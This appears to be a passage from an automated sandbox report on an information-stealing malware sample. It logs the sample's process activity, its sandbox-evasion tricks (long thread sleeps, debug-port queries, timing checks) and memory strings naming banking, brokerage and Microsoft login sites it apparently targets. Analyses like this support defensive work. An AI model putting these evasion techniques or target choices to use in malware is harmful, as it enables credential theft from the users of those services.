Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\dllhost.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BD1C0 rdtsc 5_2_032BD1C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347799BE sldt word ptr [eax] 4_2_00007FFD347799BE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1611
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1493
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4475
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5377
Source: C:\Windows\SysWOW64\dllhost.exe Window / User API: threadDelayed 1439
Source: C:\Windows\SysWOW64\dllhost.exe Window / User API: threadDelayed 8534
Source: C:\Windows\SysWOW64\appidtel.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\dllhost.exe API coverage: 2.8 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5412 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796 Thread sleep count: 4475 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5936 Thread sleep count: 5377 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6096 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\SysWOW64\dllhost.exe TID: 3908 Thread sleep count: 1439 > 30
Source: C:\Windows\SysWOW64\dllhost.exe TID: 3908 Thread sleep time: -2878000s >= -30000s
Source: C:\Windows\SysWOW64\dllhost.exe TID: 3908 Thread sleep count: 8534 > 30
Source: C:\Windows\SysWOW64\dllhost.exe TID: 3908 Thread sleep time: -17068000s >= -30000s
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe TID: 1592 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\dllhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0309C3C0 FindFirstFileW,FindNextFileW,FindClose, 11_2_0309C3C0
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: -400GIK8.11.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: -400GIK8.11.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: -400GIK8.11.dr Binary or memory string: discord.comVMware20,11696487552f
Source: -400GIK8.11.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: agement pageVMware20,11696487552
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,1169648
Source: -400GIK8.11.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: QEwzeZKCXN.exe, 0000000C.00000002.3411016240.000000000124F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: swordVMware20,11696487552}
Source: -400GIK8.11.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,116964875
Source: -400GIK8.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: -400GIK8.11.dr Binary or memory string: global block list test formVMware20,11696487552
Source: -400GIK8.11.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: -400GIK8.11.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: -400GIK8.11.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 0000000D.00000002.3048982988.0000015C8A0DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -400GIK8.11.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: -400GIK8.11.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: -400GIK8.11.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: omVMware4
Source: -400GIK8.11.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20D
Source: -400GIK8.11.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: powershell.exe, 00000004.00000002.2358982839.000001FEBE0C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWcl%SystemRoot%\system32\mswsock.dll
Source: -400GIK8.11.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: -400GIK8.11.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: -400GIK8.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20
Source: -400GIK8.11.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: -400GIK8.11.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: -400GIK8.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: -400GIK8.11.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ive Brokers - NDCDYNVMware20,11696487552z
Source: -400GIK8.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: -400GIK8.11.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\appidtel.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\dllhost.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BD1C0 rdtsc 5_2_032BD1C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00417443 LdrLoadDll, 5_2_00417443
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326F32A mov eax, dword ptr fs:[00000030h] 5_2_0326F32A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03237330 mov eax, dword ptr fs:[00000030h] 5_2_03237330
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330132D mov eax, dword ptr fs:[00000030h] 5_2_0330132D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C930B mov eax, dword ptr fs:[00000030h] 5_2_032C930B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327A30B mov eax, dword ptr fs:[00000030h] 5_2_0327A30B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323C310 mov ecx, dword ptr fs:[00000030h] 5_2_0323C310
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03260310 mov ecx, dword ptr fs:[00000030h] 5_2_03260310
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FF367 mov eax, dword ptr fs:[00000030h] 5_2_032FF367
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032E437C mov eax, dword ptr fs:[00000030h] 5_2_032E437C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03247370 mov eax, dword ptr fs:[00000030h] 5_2_03247370
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330A352 mov eax, dword ptr fs:[00000030h] 5_2_0330A352
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h] 5_2_032C2349
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323D34C mov eax, dword ptr fs:[00000030h] 5_2_0323D34C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03315341 mov eax, dword ptr fs:[00000030h] 5_2_03315341
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239353 mov eax, dword ptr fs:[00000030h] 5_2_03239353
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C035C mov eax, dword ptr fs:[00000030h] 5_2_032C035C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C035C mov ecx, dword ptr fs:[00000030h] 5_2_032C035C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032633A5 mov eax, dword ptr fs:[00000030h] 5_2_032633A5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032733A0 mov eax, dword ptr fs:[00000030h] 5_2_032733A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326438F mov eax, dword ptr fs:[00000030h] 5_2_0326438F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323E388 mov eax, dword ptr fs:[00000030h] 5_2_0323E388
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0331539D mov eax, dword ptr fs:[00000030h] 5_2_0331539D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0329739A mov eax, dword ptr fs:[00000030h] 5_2_0329739A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03238397 mov eax, dword ptr fs:[00000030h] 5_2_03238397
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FF3E6 mov eax, dword ptr fs:[00000030h] 5_2_032FF3E6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h] 5_2_032503E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033153FC mov eax, dword ptr fs:[00000030h] 5_2_033153FC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E3F0 mov eax, dword ptr fs:[00000030h] 5_2_0325E3F0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032763FF mov eax, dword ptr fs:[00000030h] 5_2_032763FF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FC3CD mov eax, dword ptr fs:[00000030h] 5_2_032FC3CD
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0324A3C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032483C0 mov eax, dword ptr fs:[00000030h] 5_2_032483C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C63C0 mov eax, dword ptr fs:[00000030h] 5_2_032C63C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FB3D0 mov ecx, dword ptr fs:[00000030h] 5_2_032FB3D0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03315227 mov eax, dword ptr fs:[00000030h] 5_2_03315227
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323823B mov eax, dword ptr fs:[00000030h] 5_2_0323823B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03277208 mov eax, dword ptr fs:[00000030h] 5_2_03277208
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03277208 mov eax, dword ptr fs:[00000030h] 5_2_03277208
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03244260 mov eax, dword ptr fs:[00000030h] 5_2_03244260
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03244260 mov eax, dword ptr fs:[00000030h] 5_2_03244260
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03244260 mov eax, dword ptr fs:[00000030h] 5_2_03244260
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323826B mov eax, dword ptr fs:[00000030h] 5_2_0323826B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03269274 mov eax, dword ptr fs:[00000030h] 5_2_03269274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03281270 mov eax, dword ptr fs:[00000030h] 5_2_03281270
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03281270 mov eax, dword ptr fs:[00000030h] 5_2_03281270
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330D26B mov eax, dword ptr fs:[00000030h] 5_2_0330D26B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330D26B mov eax, dword ptr fs:[00000030h] 5_2_0330D26B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h] 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239240 mov eax, dword ptr fs:[00000030h] 5_2_03239240
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239240 mov eax, dword ptr fs:[00000030h] 5_2_03239240
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327724D mov eax, dword ptr fs:[00000030h] 5_2_0327724D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C8243 mov eax, dword ptr fs:[00000030h] 5_2_032C8243
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C8243 mov ecx, dword ptr fs:[00000030h] 5_2_032C8243
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323A250 mov eax, dword ptr fs:[00000030h] 5_2_0323A250
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FB256 mov eax, dword ptr fs:[00000030h] 5_2_032FB256
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FB256 mov eax, dword ptr fs:[00000030h] 5_2_032FB256
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CD250 mov ecx, dword ptr fs:[00000030h] 5_2_032CD250
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03246259 mov eax, dword ptr fs:[00000030h] 5_2_03246259
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032552A0 mov eax, dword ptr fs:[00000030h] 5_2_032552A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032552A0 mov eax, dword ptr fs:[00000030h] 5_2_032552A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032552A0 mov eax, dword ptr fs:[00000030h] 5_2_032552A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032552A0 mov eax, dword ptr fs:[00000030h] 5_2_032552A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h] 5_2_032D62A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D62A0 mov ecx, dword ptr fs:[00000030h] 5_2_032D62A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h] 5_2_032D62A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h] 5_2_032D62A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h] 5_2_032D62A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h] 5_2_032D62A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D72A0 mov eax, dword ptr fs:[00000030h] 5_2_032D72A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D72A0 mov eax, dword ptr fs:[00000030h] 5_2_032D72A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C92BC mov eax, dword ptr fs:[00000030h] 5_2_032C92BC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C92BC mov eax, dword ptr fs:[00000030h] 5_2_032C92BC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C92BC mov ecx, dword ptr fs:[00000030h] 5_2_032C92BC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C92BC mov ecx, dword ptr fs:[00000030h] 5_2_032C92BC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033092A6 mov eax, dword ptr fs:[00000030h] 5_2_033092A6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033092A6 mov eax, dword ptr fs:[00000030h] 5_2_033092A6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033092A6 mov eax, dword ptr fs:[00000030h] 5_2_033092A6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033092A6 mov eax, dword ptr fs:[00000030h] 5_2_033092A6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327E284 mov eax, dword ptr fs:[00000030h] 5_2_0327E284
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327E284 mov eax, dword ptr fs:[00000030h] 5_2_0327E284
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C0283 mov eax, dword ptr fs:[00000030h] 5_2_032C0283
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C0283 mov eax, dword ptr fs:[00000030h] 5_2_032C0283
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C0283 mov eax, dword ptr fs:[00000030h] 5_2_032C0283
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03315283 mov eax, dword ptr fs:[00000030h] 5_2_03315283
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327329E mov eax, dword ptr fs:[00000030h] 5_2_0327329E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327329E mov eax, dword ptr fs:[00000030h] 5_2_0327329E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h] 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032502E1 mov eax, dword ptr fs:[00000030h] 5_2_032502E1
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032502E1 mov eax, dword ptr fs:[00000030h] 5_2_032502E1
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032502E1 mov eax, dword ptr fs:[00000030h] 5_2_032502E1
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033152E2 mov eax, dword ptr fs:[00000030h] 5_2_033152E2
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FF2F8 mov eax, dword ptr fs:[00000030h] 5_2_032FF2F8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032392FF mov eax, dword ptr fs:[00000030h] 5_2_032392FF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032492C5 mov eax, dword ptr fs:[00000030h] 5_2_032492C5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032492C5 mov eax, dword ptr fs:[00000030h] 5_2_032492C5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h] 5_2_0326B2C0
